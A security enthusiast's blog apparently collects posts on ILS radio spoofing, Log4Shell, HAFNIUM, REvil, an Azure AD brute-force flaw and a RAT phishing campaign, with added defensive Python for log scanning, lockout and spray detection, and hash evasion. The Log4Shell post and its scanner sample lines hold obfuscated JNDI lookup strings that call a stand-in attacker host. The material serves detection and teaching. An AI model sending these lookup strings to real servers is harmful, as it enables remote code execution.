Planes are pretty cool! – Food for thought #3.

Just a little unstructured rambling today from me, I’m sure someone will enjoy the read…

I have begun reading through a 2016 thesis on security in next-generation air traffic communication networks by Martin Strohmeier, which was brought to my attention during discussions about a possible use case for software-defined radio. This isn’t anything new: the first proof of concept I saw of such methods was, I believe, from DEF CON 17 in 2009, but I can’t remember the date off the top of my head.

We can discuss some cool hacking stuff in a second, but first you need to understand how an aircraft finds the runway. I’m going to briefly discuss a presentation from USENIX demonstrating attacks on an aircraft’s Instrument Landing System (ILS). An ILS installation uses multiple Tx antennas (Tx means transmit; receive and transmit are commonly abbreviated to Rx and Tx respectively). The localizer aligns the aircraft laterally with the runway centreline, and the glideslope gives vertical guidance so the aircraft follows the correct descent path to the touchdown zone. Each transmits two overlapping lobes, one amplitude-modulated with a 90 Hz tone and the other with a 150 Hz tone; the receiver compares the depth of modulation of the two tones, and that difference is the deviation the cockpit instruments display. The important point for what follows is that the receiver trusts whatever radio energy it measures: there is no authentication of where the signal came from. If you know enough about radio and security concepts then I highly recommend you read the presentation this is regarding; I’m not qualified to discuss it in too much detail but will be trying to learn more about this when I can.

So we’ve discussed how the ILS is responsible for guidance during landing and, very basically, how it does that. The presentation takes advantage of some behaviours of the aircraft’s ILS receiver. For example, receivers are designed to “lock on” to the strongest signal, which is sensible when you consider that some airports have multiple runways and therefore multiple ILS installations, so a way to pick the right one is required. But with what is called an “overshadow attack”, an attacker can simply overpower the legitimate signals with their own, provided they have enough information to carry out the attack; that information is assumed to be available, since services like Flightradar24 let anyone track flight paths and a great deal about these systems is already in the public domain. There is another attack called a “single-tone attack”, which is a little less straightforward than simply overpowering a signal; nevertheless I will touch on it at some point in the future after more reading.

Above we went over a high-level explanation of one of the wireless attacks that could be orchestrated against an ILS. One of the biggest concerns I see mentioned is the relative affordability and availability of SDR modules: more people can now carry out these attacks with less equipment than was required before, even from on board the aircraft… With demonstrated offsets of up to 50 metres and the concealment an SDR may provide, this represents a serious attack vector that could be exploited to cause devastation and mass casualties.

Ok, so let’s get to some of the hacker stuff, what even brought this to my attention?

Ukrainian cyber forces have been hard at work. I was discussing this topic with some other hackers and a Ukrainian national given a “free pass” to hit Russia, and whilst the topic at first was messing with these systems on board the aircraft, someone raised the idea of instead transmitting signals that would be expected to come from an aircraft. This again isn’t a new idea… It’s been tested, and even with notification and preparation it caused an absolute nightmare for air traffic control. Furthermore, the opening for a denial-of-service attack is certainly worth highlighting. Nearly every system operated by a human is vulnerable to operator overload, and that’s certainly not exclusive to human operators either. Just sending lots of signals could be all it takes to shut down a section of civilian airspace. It certainly would give Russian airspace controllers a hard time if it was done; however, such an attack would be indiscriminate and, by the nature of naughty things… hard to control.

I will be looking into more of this topic in my spare time. Also, having just started getting competent with the cloud myself, I will be looking to move this site onto an IaaS platform. However, there are many things to weigh up: I might not switch this site itself over, and I also need to explore the options available to me regarding things like subdomains. WordPress is fantastic and not something I want to leave for any reason, but as we move forward aacyber aspires to officially set up and be able to actively assist in keeping everyone in cyberspace safe.

Aldi’s DIY soldering iron is a decent buy for £9.99, and it even comes with 7 grams of solder. Sure, it’s not the best in the world, but I’m not selling anything I make yet…

Here comes the “Cyber Army”.

Hello World…

So the Russian government finally pulled the trigger on their invasion of Ukraine, and since then we have seen information warfare erupt as the Russian dictator tries to deny any wrongdoing. But I wanted to talk about the “Cyber Army” now threatening Russian government infrastructure, not the Ukrainians in particular but the world as a whole.

Anonymous is probably the best-known group targeting Russia, dumping credentials and PGP keys from the mil.ru domain; the domain has since been geo-fenced to Russian territory. So what’s the issue… hackers want to stand up for Ukraine and I have a problem with it?

Not just me, but many voices have spoken out about their concerns. Any party not affiliated with a government and/or its intelligence services should leave Russian systems the fuck alone. Firstly, no matter who your target is, this kind of action is strictly prohibited and criminal; it will lead to consequences for anyone carrying out malicious activity… possibly prison time. Secondly, there is a significant risk to legitimate intelligence operations when a bunch of script kiddies start trampling around a system. Imagine hiding for years only to be undone because someone comes along with a drum set…

That is all. I am trying to push my skills more recently, so the blog may slow down as I allow time for study. A little bit of a rant, but it needs to be said; that’s my position on this.

Russian Threat Actors

Image Source: https://blog.malwarebytes.com/

Hello World!

Short and sweet here. With tensions between NATO and Russia rising, multiple agencies have put out advisories to keep your eyes peeled for cyber threats out of Russia. I would encourage anyone currently involved in security to review the tactics, techniques and procedures (TTPs) of these actors. Here’s a good report from CISA about the topic, and a good read to help increase resilience to this current threat.

To keep yourself informed on the current state of cyberspace I recommend the CyberWire Daily podcast; the news is relevant and gives insight from experts in their fields.

Rather technical, but it’s a topic that can no longer be avoided; hopefully our nations can work together to de-escalate this situation and improve security for citizens all around the world going forward.

2021 – A Year in review.

Hello World!

As 2021 now comes to a close, the effects of the new year festivities subside and teams, students and professionals sit back down in the office full time. Another year that will surely be packed with many surprises awaits us…

2021, like 2020, was marred by the effects of the global coronavirus pandemic and a political divide in society like never before, pushing us further and further apart at a time when cooperation and diversity are (as always) incredibly important within the IT industry.

That brings me to the first topic of my review, as I try to take a look at the hybrid warfare that is happening every day. In my opinion, influence and information are the main goals of groups in the current landscape; it likely won’t stay that way in the future, but we are still in the very early stages. With the ability to spew misinformation and disinformation around a critical topic such as the coronavirus or vaccines, this control of information and influence could be used to exacerbate another country’s political unrest as well as to overload health systems worldwide. This topic isn’t specific to this year or the pandemic, as these information tactics are used worldwide almost every day… but we must ask ourselves: “Where did this information come from?”, “Is the source trustworthy?”, “Has this information been reviewed by independent experts?”.

As defenders were still feeling the effects of the SolarWinds supply chain attack, in which more than 18,000 SolarWinds customers installed the trojanised update last December (only a fraction of them were then followed up on by the attackers), a new problem was found within Microsoft Exchange servers… well, four of them to be precise.

A group that was given the name HAFNIUM was detected exploiting these four vulnerabilities in the wild for information theft and espionage. HAFNIUM, who Microsoft described as “state-sponsored and operating out of China”, is a sophisticated adversary, and the activity pushed Microsoft into releasing out-of-band updates on 2 March 2021. The CVEs associated with this attack are CVE-2021-26855 (a server-side request forgery that lets an unauthenticated attacker act as the Exchange server), CVE-2021-26857 (an insecure deserialization in the Unified Messaging service), and CVE-2021-26858 and CVE-2021-27065 (post-authentication arbitrary file writes). Chained together, the SSRF provides the authentication and a file write drops a web shell on the compromised server, which the adversary then uses to consolidate their position and exfiltrate information from the target. However, it wasn’t just HAFNIUM attempting to exploit these vulnerabilities: once some time had elapsed, threat intel teams detected mass scanning and exploitation by other groups.

Let’s move to the month of May… probably the most significant month of 2021 in cyber security. We saw five major attacks in that month, all of which had a significant effect on daily life for a large number of people: the Colonial Pipeline ransomware attack, the Health Service Executive (Ireland) ransomware attack, the Waikato District Health Board ransomware attack, the JBS S.A. cyberattack and the Air India data breach.

So let’s pick up on two factors here: ransomware and healthcare… I won’t elaborate too much on ransomware, as it’s nothing new, it’s not declining, and a prediction that “it’ll continue for 2022” isn’t worth spending oxygen on; it has become a constant pain in the backside over the last few years and will not be letting up soon. Instead let’s look at healthcare. Alongside critical infrastructure such as water and electricity, healthcare is a key sector where an attack has the ability not only to cause damage but to change lives and families. Why healthcare finds itself so susceptible lies in the critical role its staff and systems play on a daily basis: some of these computers are relied on to save lives or to operate complex machinery, which makes taking them offline to upgrade difficult, and that is before the cost of the replacement product AND the cost of upskilling employees on the new equipment… which sometimes pushes upgrading or patching down the list.

Well, I’m struggling to keep it short and sweet here, but let’s move on to the month of July, where we saw the Kaseya ransomware attack, in which the REvil ransomware group claimed to have infected more than 1 million devices, according to security firm Sophos. This was another supply chain attack: Kaseya said that fewer than 60 of its direct customers were affected, but because many of those were managed service providers the impact was felt by fewer than 1,500 downstream businesses. The crooks attempted to extort $70m in cryptocurrency for a universal decryptor; however, REvil would soon lose control…

In one of the first public cases of “hacking back” by the FBI that I have seen myself (I wrote a post about it that can be seen here), there was a lot of activity by law enforcement that sparked weeks of speculation before the FBI confirmed they had indeed compromised the group behind the attack on Kaseya and withheld the decryption key for some time. This was done in order not to tip off the cyber gang to their activity, as a decryption key suddenly appearing would surely have set alarm bells ringing in the criminals’ heads. The story had a mostly happy ending, with a small number of the criminals arrested, money that was paid being recovered by law enforcement, and the distribution of the universal decryptor to affected parties.

While there’s tons to potentially discuss on the topic, I’d like this to be a comfortable read… Briefly, I’ll close by mentioning the Log4j vulnerabilities, which since my last blog post have escalated slightly, with more vulnerabilities being discovered in Log4j on an almost weekly basis. No doubt this is due to hackers of all kinds swarming over Log4j, as it marks one of the most significant vulnerabilities in history, as reflected by the initial CVSS score of 10.0; the more recent vulnerabilities are less severe. Advice as of this post is that the safe versions are Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7) or 2.17.1 (for Java 8 and later).

Well that’s all in my mini-review. As we look towards another year with newfound hope and motivation, I hope this year is better for all of us and to see more smiles on the faces of people as we all play our role in protecting others.

Sources: https://whatis.techtarget.com/feature/SolarWinds-hack-explained-Everything-you-need-to-know
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/
https://www.techrepublic.com/article/kaseya-supply-chain-attack-impacts-more-than-1000-companies/

Remote Code Execution in Java Apache Log4j 2 (CVE-2021-44228)

Hello World!

The Internet was rattled the last couple of days over a new critical bug found within a very ubiquitous library. Vulnerable versions are Apache Log4j 2.0-beta9 through 2.14.1; the “2.10 to 2.14.1” range that has been widely circulated is the set of versions on which the formatMsgNoLookups mitigation property exists, not the full vulnerable range. Patches are now mostly available and should be installed as soon as possible; CVE-2021-44228 is currently being exploited in the wild, and there have already been cases of Log4j payloads being used to drop cryptominers.

Edit 4th January 2022: Updated mitigation information. Current secure versions are as follows: Log4j 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).

JNDI – Java Naming and Directory Interface.

LDAP – Lightweight Directory Access Protocol.

A basic flow chart to illustrate the attack methods. Credit: Fastly

Here’s a brief explanation of the exploit from an attacker’s perspective… An attacker-controlled value (a User-Agent header, a username, anything that ends up in a log message) is passed to the logging library. Log4j’s string interpolation feature evaluates lookups embedded in that value, and a lookup of the form `${jndi:ldap://attacker-host/x}` makes the server connect to an LDAP (or RMI) server the attacker controls and fetch whatever object it returns; depending on the JVM configuration that leads to loading a remote class or deserializing attacker-supplied data, which results in remote code execution on the server. To put this simply for others, this allows the attacker to execute their own code on the server, essentially letting them do anything… (but how much damage follows will depend on the attacker’s skill level).

Since the 9th of December the cyber security world has been scrambling to mitigate this vulnerability. There are configuration options that disable the functionality responsible (setting the `log4j2.formatMsgNoLookups` system property, or the `LOG4J_FORMAT_MSG_NO_LOOKUPS` environment variable, to true on versions 2.10 to 2.14.1, or removing the `JndiLookup` class from the log4j-core jar entirely), but these are temporary fixes, and Apache later noted that the formatMsgNoLookups flag alone is not sufficient in some non-default configurations. Update the vulnerable library if you have the ability to, but many people will have to wait for individual patches from the vendors of their products.

On November 24, 2021, Apache was notified about the Log4j remote code execution vulnerability by the Alibaba Cloud Security team. The exploit proof of concept was then posted to Github at 15:32 GMT on December 9, 2021, and we saw the first attempts to trigger callbacks 82 minutes later.
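Most of the exploitation attempts seen in the wild hide the `${jndi:` lookup behind nested lookups (`${lower:j}`, `${${::-j}...}`) or URL encoding, so a plain text search for `jndi` misses them. The following is an added example, not code from this post or from Fastly: a small log-review helper that percent-decodes each line, collapses the nested `${lower:}`, `${upper:}` and `${name:-default}` lookups from the inside out the way Log4j’s own substitutor would, and only then checks for the JNDI lookup. The sample log lines, addresses and hostnames are constructed for the demonstration; the set of lookups it resolves is deliberately limited to the ones commonly used for obfuscation, so treat it as a triage aid rather than a complete parser.

```python
import re
from urllib.parse import unquote

# Innermost ${...} whose body contains no further $, { or }.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)

# Constructed sample log lines in a web-server style; the addresses and hostnames are made up.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/x}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 "-"',
    '10.0.0.7 - - "GET /status HTTP/1.1" 200 "monitor/${hostname}"',
]


def url_decode(text, rounds=3):
    """Undo up to `rounds` layers of percent-encoding, stopping early once nothing changes."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def resolve_lookup(body):
    """Evaluate one innermost lookup the way Log4j's substitutor does for the lookups
    commonly used to obfuscate the string: ${lower:x}, ${upper:x} and the ${name:-default}
    fallback (so ${::-j} becomes "j"). Any other lookup is dropped (an assumption that
    keeps the loop terminating; real Log4j would try to resolve it)."""
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return ""


def normalize(text, max_rounds=64):
    """Percent-decode, then collapse nested lookups from the inside out until either
    nothing is left to resolve or a jndi: lookup has been exposed."""
    text = url_decode(text)
    for _ in range(max_rounds):
        match = INNERMOST.search(text)
        if match is None:
            break
        body = match.group(1)
        if body.strip().lower().startswith("jndi:"):
            break  # the real lookup is now visible; leave it in place for the regex
        text = text[:match.start()] + resolve_lookup(body) + text[match.end():]
    return text


def is_jndi_probe(line):
    return JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line index, normalized form) for every line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_jndi_probe(line)]


if __name__ == "__main__":
    for i, norm in scan(SAMPLE_LINES):
        print(f"line {i}: {norm}")
```

Running it flags lines 1 to 4 and leaves the benign `${hostname}` line alone; the normalized form of each hit is what you would pivot on when hunting the callback host in proxy or DNS logs.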

I also received my YubiKeys around the same time. I haven’t completed setting them up yet but plan to have a post about them up soon; it won’t be highly technical, as I more want to sell the technology and get the point across as to why you should be using MFA and/or security keys.

Sources: https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j & Bishop Fox/YouTube

YubiKeys!

Hello World!

I finally bit the bullet and bought myself two YubiKeys and a cover for each. One for my person and one for a safe place configured as a backup.

What’s a YubiKey?

Wikipedia states: “The YubiKey is a hardware authentication device manufactured by Yubico to protect access to computers, networks, and online services that supports one-time passwords, public-key cryptography, and authentication, and the Universal 2nd Factor and FIDO2 protocols developed by the FIDO Alliance.”

Only a short post today but expect to see a post about my initial thoughts and experiences using the YubiKey. There’s currently some cool Black Friday deals going on and I would advise you take a look if you want to step up your account security with YubiKeys!

Combined with a password manager and multi-factor authentication (where the YubiKey comes in), this will stop nearly all attempts against your accounts… I have heard a 99% figure for just 2FA being enabled but don’t have a source for it at this moment.

REvil on the run!

Hello World!

Ransomware hackers and affiliates of REvil (Ransomware Evil), also known as Sodinokibi, are on the run from the feds this week. One can suspect that the US authorities have it out for them, as this is not the first occasion of direct engagement against this threat actor (TA).

If you follow the story as closely as I do, then you might already be aware of the kerfuffle with the decryption keys a few months ago; the official story about it only dropped a couple of weeks ago. Basically, one of Kaseya’s IT management platforms was compromised in what we call a supply chain attack, the aim being to hold the companies that use this platform, and their data, to ransom.

This is achieved through the use of a piece of malware known as ransomware, which falls under the category of crypto-malware; see the image below for a look at what a user infected with the WannaCry ransomware would see.

So, what did I mean when I said this isn’t the first engagement… and what is the recent news of the official story?

Well, the gang took themselves “offline” after attracting too much attention with their attack on Kaseya, then re-emerged from the shadows a few months later. What the gang and their affiliates were unaware of is that a campaign by international law enforcement had compromised their systems, exfiltrated information and, most importantly here, had already compromised the backups that REvil used to restore their infrastructure. So you can see who has the upper hand in this situation.

To step away from the story of REvil and their fight with government hackers (which isn’t going so well for the criminals, who have seen multiple arrests across several countries), it would be good to have a brief talk about what we do to defend against ransomware and just how much the battlefield is evolving. Firstly let’s go all the way back to 1989, when the AIDS Trojan first made its way onto computers via the medium of the floppy disk; this was the first documented case of a ransomware attack. Victims were asked to mail cash to a PO box in Panama; however, because it used simple symmetric encryption with the key recoverable from the malware itself, security researchers were able to quickly develop tools that decrypted the data relatively easily.

Now, you don’t need to know too much about how it has changed over the years, or the technical details of how it encrypts, installs and so on. But let’s step back into 2021, nearly 2022 as I write this… Ransomware is no longer just about a “denial of service” to the data; we have seen the rise of double extortion, where attackers not only encrypt your data but also exfiltrate it and threaten to make it public too!

Our security methods change all the time, but active defence could play an important role against these double-extortion attacks. If a network defender keeps creating file shares padded with random but legitimate-looking information, uses telemetry simulators to confuse the attackers, and applies many other techniques along those lines, it can give the defender the upper hand: the attacker wastes time exfiltrating junk and risks tripping alerts while doing it.

I look forward to hopefully taking a look at some methods that would be used to stall an attack as it happens, but will recommend a book to any security professional interested in the idea of a cyber-battlefield as it’s a brilliant read… Adversarial Tradecraft in Cybersecurity by Dan Borges.

Undetected Brute force attacks in Microsoft Azure AD.

Hello World!

Recently security researchers have released a PoC (proof-of-concept) exploit that allows username enumeration and password brute-forcing against Microsoft Azure Active Directory. It is able to do this by taking advantage of weaknesses that lie within the Autologon mechanism.

Let’s do a quick breakdown on some of these words here, for those who are unsure –

Exploit – An exploit is something designed to take advantage of one or more weaknesses in a person or a device; it is a universal term and not limited to people or computer systems.

Enumeration – Enumeration is the process of identification, categorisation and documentation. Here we are using it to refer to username enumeration, which in simple terms means “gathering a list of valid usernames” (in this case by observing that the endpoint answers differently for a real user with a wrong password than for a user that doesn’t exist). This can be achieved with various methods and again isn’t necessarily technical.

Brute-forcing – Take the PIN on a phone, for example: if you have no idea what it might be but you keep guessing every possible combination until you get it right, you’ve brute-forced it.

Lockout – Not mentioned in the first paragraph, but essential to understanding brute-force attacks and the simplest mechanism to stop them. Take the phone we brute-forced as an example. In case you’ve never seen a lockout, try inputting the wrong PIN into your phone a few times (not too many, because the lockout increments up to around 24 hours). The mechanism detects repeated incorrect input and assumes you are not authorised: should you enter your username/password incorrectly multiple times, you will be blocked from further attempts for X amount of time. (And there should be a log the administrators can see that shows ALL successful and unsuccessful attempts and provides further info; the whole point of the flaw discussed here is that this log is missing.)

Active Directory – I took this one from techterms.com, as Active Directory and Azure Active Directory are a lot to take in and I really don’t want to scare non-technical readers with lots of different names to remember. Click the link and it’ll show more information, but still only scratches the surface.

“Active Directory (AD) is a Microsoft technology used to manage computers and other devices on a network. It is a primary feature of Windows Server, an operating system that runs both local and Internet-based servers. Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an admin can create a group of users and give them specific access privileges to certain directories on the server. As a network grows, Active Directory provides a way to organize a large number of users into logical groups and subgroups, while providing access control at each level.”

Azure – Azure is Microsoft’s cloud platform; it’s what AWS is to Amazon. Essentially, cloud means running on someone else’s off-site infrastructure, though there are several service models such as IaaS, SaaS and PaaS. Attackers use the cloud too, and have been seen operating RaaS (Ransomware-as-a-Service).

“This flaw allows threat actors to perform single-factor brute-force attacks against Azure Active Directory (Azure AD) without generating sign-in events in the targeted organization’s tenant,” researchers from Secureworks Counter Threat Unit (CTU) said in a report published on Wednesday.

It would appear that the Autologon endpoint in question is used by Office clients older than the Office 2013 May 2015 update, which don’t use Kerberos. Instead, in order to carry out authentication, a password-based endpoint called “UserNameMixed” is used, which returns either an access token or an error code depending on the input from the user.

So here’s the problem, and this is where Autologon plays its role… Whilst successful sign-ins generate logs when the access token is issued, failed authentication attempts from Autologon to Azure AD are not logged in the tenant’s sign-in logs at all. Attackers can leverage this to carry out password-spraying or brute-force attacks without generating the logs a defender would normally alert on. (Password spraying is a form of brute forcing that tries one or a few likely passwords, such as a seasonal default or a password from a known breach, against a long list of usernames; because each account only sees a handful of attempts it stays under the lockout threshold, and the usernames are often gathered through enumeration earlier in the attack.)
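To make the lockout and spraying points concrete, here is an added example; it is not code from this post, from Secureworks or from Microsoft, and it has nothing to do with the real Autologon endpoint. It is a toy password endpoint that records every attempt, applies an escalating per-account lockout like the phone example above, and runs a spray detector over that audit record. It shows that lockout stops a straight brute force of one account, that a spray of one password across many accounts never trips it, and that the spray is only caught by looking at failures across accounts and sources, which is exactly the telemetry an unlogged endpoint denies you. The thresholds (5 failures, 60 second base lockout, 10 accounts within 5 minutes), the account names and the RFC 5737 test addresses are all assumptions made for the demonstration.

```python
import hashlib
import hmac
import os
from collections import defaultdict


def derive_key(password, salt):
    # PBKDF2 stands in for however the real directory stores credentials.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


class AuthService:
    """Toy password endpoint: per-account escalating lockout and an audit record of every attempt."""

    def __init__(self, max_failures=5, base_lockout=60, max_lockout=86_400):
        self.max_failures = max_failures   # assumed thresholds, not Azure AD's
        self.base_lockout = base_lockout   # seconds; doubles on each repeat lockout
        self.max_lockout = max_lockout     # cap, like the phone's ~24 hours
        self.credentials = {}              # user -> (salt, derived key)
        self.failures = defaultdict(int)   # consecutive failures per user
        self.lockouts = defaultdict(int)   # how many times each user has been locked
        self.locked_until = {}             # user -> epoch seconds
        self.audit = []                    # (time, user, src_ip, outcome) for EVERY attempt

    def register(self, user, password):
        salt = os.urandom(16)
        self.credentials[user] = (salt, derive_key(password, salt))

    def authenticate(self, user, password, src_ip, now):
        outcome = self._check(user, password, now)
        self.audit.append((now, user, src_ip, outcome))  # logged whether it worked or not
        return outcome

    def _check(self, user, password, now):
        if self.locked_until.get(user, 0) > now:
            return "locked"
        # Unknown users take the same code path and get the same answer as a wrong
        # password, so the response does not enumerate which usernames exist.
        salt, key = self.credentials.get(user, (b"\0" * 16, b""))
        if not hmac.compare_digest(derive_key(password, salt), key):
            self.failures[user] += 1
            if self.failures[user] >= self.max_failures:
                self.lockouts[user] += 1
                duration = min(self.base_lockout * 2 ** (self.lockouts[user] - 1), self.max_lockout)
                self.locked_until[user] = now + duration
                self.failures[user] = 0
                return "locked"
            return "failure"
        self.failures[user] = 0
        return "success"


def detect_spray(audit, window=300, min_accounts=10):
    """Flag source IPs whose failures touch many distinct accounts within `window` seconds.
    Per-account lockout never sees this pattern; only cross-account telemetry does."""
    by_src = defaultdict(list)
    for t, user, src_ip, outcome in audit:
        if outcome != "success":
            by_src[src_ip].append((t, user))
    flagged = {}
    for src_ip, events in by_src.items():
        events.sort()
        for t0, _ in events:
            accounts = {u for t, u in events if t0 <= t < t0 + window}
            if len(accounts) >= min_accounts:
                flagged[src_ip] = len(accounts)
                break
    return flagged


def demo():
    svc = AuthService()
    users = [f"user{i:02d}" for i in range(12)]  # constructed accounts
    for u in users:
        svc.register(u, f"correct-horse-{u}")
    t = 1_700_000_000  # fixed clock so the run is reproducible
    # 1. Straight brute force of one account from one address.
    brute = [svc.authenticate("user00", f"guess{i}", "198.51.100.7", t + i) for i in range(6)]
    while_locked = svc.authenticate("user00", "correct-horse-user00", "198.51.100.7", t + 30)
    after_lockout = svc.authenticate("user00", "correct-horse-user00", "198.51.100.7", t + 70)
    # 2. Password spray: one guess per account, so no account ever reaches the threshold.
    spray = [svc.authenticate(u, "Winter2021!", "203.0.113.42", t + 100 + i) for i, u in enumerate(users)]
    return {"brute": brute, "while_locked": while_locked, "after_lockout": after_lockout,
            "spray": spray, "alerts": detect_spray(svc.audit), "audit": svc.audit}


if __name__ == "__main__":
    r = demo()
    print("brute force:", r["brute"])
    print("spray alerts:", r["alerts"], "| attempts logged:", len(r["audit"]))
```

The brute force turns into `locked` on the fifth guess and stays locked even for the correct password until the window expires, while all twelve spray attempts come back as plain `failure` and only `detect_spray` notices the single source behind them. Delete the `audit` list and that second detection simply cannot be built, which is the Autologon problem in miniature.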

Finally, let’s see how the vendor responded… “Secureworks said it notified Microsoft of the issue on June 29, only for Microsoft to acknowledge the behaviour on July 21 as ‘by design.’” Oh okay! Ambiguous and puzzling… nothing new here.

Sources: https://arstechnica.com/information-technology/2021/09/poc-exploit-released-for-azure-ad-brute-force-bug-heres-what-to-do/
https://thehackernews.com/2021/09/new-azure-ad-bug-lets-hackers-brute.html

Operation Layover – Attack campaign against Aviation sector uncovered.

Hello World!

I wanted to take a look at a recent phishing campaign that was uncovered after being active for roughly two years. It’s interesting to me, as I have studied aviation operations in the past and have good knowledge of the sector’s procedures and practices.

So let’s see what we know about this threat actor… They are suspected to be operating out of Nigeria and, from what we can gather, aren’t very technically skilled. The Microsoft Security Intelligence team, who first published research on these attacks in May 2021, described a “dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT.”

Okay! So what’s a RAT? A RAT, or Remote Access Trojan, is another form of malware, a cousin of the computer virus and brother of the rootkit. The program acts as a backdoor into the victim’s device, establishing communication with a command-and-control (C2) server from which it receives further instructions from the attackers. Those instructions could be to download further malware, such as a rootkit or a crypto-locker, and/or to exfiltrate data from the victim and hold it for ransom. (A sophisticated attacker might first look for privilege escalation and then pivot to a machine that hosts something like… hmm, anything really, a database for example. Or, if your team is having a really bad day, they might even get into your backups if you haven’t taken the necessary steps to keep copies off-site and offline, for example on tape, as well as following your organisation’s guidelines… and, put simply, you can’t restore if the backups are f****ed.)

To read from the Cisco Talos post here, researchers Tiago Pereira and Vitor Ventura said: “The actor also buys the crypters that allow the usage of such malware without being detected, throughout the years it has used several different cryptors, mostly bought on online forums.” This is a tactic that has become more prevalent over the last few years among less skilled threat actors, who often lack the programming knowledge to create malware, or in some cases even to edit it. Wrapping the same payload in a different crypter, file format or language changes the bytes of the resulting file (in some cases actors have simply ported existing malware to another language, compiled it, and boom). This isn’t a magical bypass by any means, but signature-based security devices will fail to recognise the repackaged threat and take action. What we would need is a way to canonicalise the file, unwrapping the packaging to reach the underlying payload before matching, but in general we lack that ability.

Signature-based security devices look for known indicators of documented malware. This could be anything from known IP addresses of command-and-control servers and known malicious domain names to the SHA-256 hash of a known malicious file. It’s with the latter that changing a single byte alters the hash completely and renders this form of detection ineffective until it is fed the new intelligence. However, this is where other layers of security, such as behavioural detection on the endpoint, would pick up and identify the threat: a reminder to layer your security… but not to over-complicate things.
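Here is an added example to illustrate the two paragraphs above; it is not code from this post or from the Talos research, and the “crypter” in it is a deliberately toy XOR wrapper with an invented `XCRYPT1` header so that the unwrapping step can actually be written. It packs one constructed payload under three different keys, shows that the SHA-256 of each packed file is different and matches nothing, and then shows that the same hash signature (plus a content indicator, the C2 hostname) fires once the file is canonicalised back to the inner payload. Real crypters do not announce themselves with a header, which is precisely why the canonicalisation step is the hard part in practice.

```python
import hashlib

# Constructed stand-in for a malicious payload: just bytes, nothing that runs.
PAYLOAD = b"RAT-STUB v1: beacon to c2.example:4444 and await tasking"
C2_HOST = b"c2.example"  # an indicator an analyst would pull out of the payload


def sha256(data):
    return hashlib.sha256(data).hexdigest()


# The "signature": the hash of the sample as the analyst first saw it.
KNOWN_BAD_HASHES = {sha256(PAYLOAD)}

MAGIC = b"XCRYPT1"  # invented header for the toy packer (assumption, not a real format)


def pack(payload, key):
    """Toy crypter: prepend a stub header and XOR every byte with a one-byte key.
    Each key yields a byte-for-byte different file carrying the identical payload."""
    if not 1 <= key <= 255:
        raise ValueError("key must be a non-zero byte")
    return MAGIC + bytes([key]) + bytes(b ^ key for b in payload)


def canonicalize(blob):
    """Undo the packer if its header is present; otherwise return the blob unchanged."""
    if blob.startswith(MAGIC) and len(blob) > len(MAGIC):
        key = blob[len(MAGIC)]
        return bytes(b ^ key for b in blob[len(MAGIC) + 1:])
    return blob


def hash_match(blob):
    """Hash-only signature check on the file exactly as delivered."""
    return sha256(blob) in KNOWN_BAD_HASHES


def canonical_match(blob):
    """Same signature applied after unwrapping, plus a content indicator that
    survives both repacking and small edits to the payload."""
    inner = canonicalize(blob)
    return sha256(inner) in KNOWN_BAD_HASHES or C2_HOST in inner


def demo():
    variants = [pack(PAYLOAD, k) for k in (0x11, 0x42, 0xA5)]
    one_byte_edit = PAYLOAD[:-1] + b"!"  # the "single character" case from the text
    return {
        "distinct_hashes": len({sha256(v) for v in variants}),
        "hash_detects": [hash_match(v) for v in variants],
        "canonical_detects": [canonical_match(v) for v in variants],
        "edited_hash_detects": hash_match(one_byte_edit),
        "edited_canonical_detects": canonical_match(one_byte_edit),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Three packed copies give three unrelated hashes and zero hits for the hash-only check, while the canonical check catches all three; the one-byte edit likewise slips past the hash but is still caught by the C2 indicator, which is the argument for layering content and behavioural indicators over plain file hashes.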

So, we’ve covered the geeky stuff about what’s going on here. Now for the heart of this campaign, which is less geeky and probably a familiar sight to any security staff… The vector of attack? Social engineering.

In this case it was a spear-phishing campaign. The emails aren’t anything fancy, just very legitimate-looking, as you would expect from pretty much any spear-phishing campaign (they tend to be the hardest to spot). It was through these emails that the victim would be prompted to install a disguised version of the remote access trojan, as shown by the email at the beginning of my post.

Source: https://thehackernews.com/2021/09/malware-attack-on-aviation-sector.html